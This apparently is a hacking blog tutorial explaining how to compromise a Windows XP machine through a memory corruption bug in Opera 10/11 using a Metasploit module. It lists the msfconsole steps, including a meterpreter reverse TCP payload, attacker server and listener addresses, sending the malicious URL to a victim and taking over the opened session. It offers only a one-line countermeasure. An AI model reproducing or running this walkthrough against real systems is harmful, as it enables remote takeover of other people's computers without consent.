Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Vulnerable Application : Opera 10 | 11
Exploit Credit : Jose A. Vazquez
After hibernating a few weeks for a trip to cities in China, now it's time to continue our easy tutorial about hacking. Today in this tutorial was talking about how to hack Windows via Opera(v10/11) memory corruption by using metasploit framework.
Requirement :1. Metasploit Framework
2. Opera.rb(credits to Jose A. Vazquez) metasploit exploit module(press CTRL + click my affiliations box to view download link below)
Step By Step :1. Update your metasploit framework by using msfupdate command, or download the opera.rb file above and copy into
/pentest/exploits/framework/modules/exploit/remote/2. Run your metasploit framework using msfconsole command and then use the exploit we've already copied in step 1. For payload we will use meterpreter reverse TCP. (see picture below)
3. When finished set up the exploit and payload, we need to determine the available switches from this exploit. To list all available switches, just run show options command.
set srvhost 192.168.8.93 --> set up the exploit server address which is our local ip address set srvport 80 --> make it looks like accessing a webpage set uripath opera --> you can change to something interesting URL (http://192.168.8.93/URIPATH) set lhost 192.168.8.93 --> IP address to handle the payload if exploit successfully performed set lport 443 --> attacker local port to handle the payload4. After everything has been set up correctly, now it's time to run the exploit server by using exploit command and then send the given URL to victim.
5. After victim opened our malicious URL, our metasploit console will show that we have a new available sessions available to connect to the victim machine.
6. To interract with the active sessions, run sessions -i 1 that means we want to interract with sessions ID no 1.
Countermeasures :1. Update to the latest Opera version
Hope it's useful
nb : click the grey area of my affiliations box to view the download link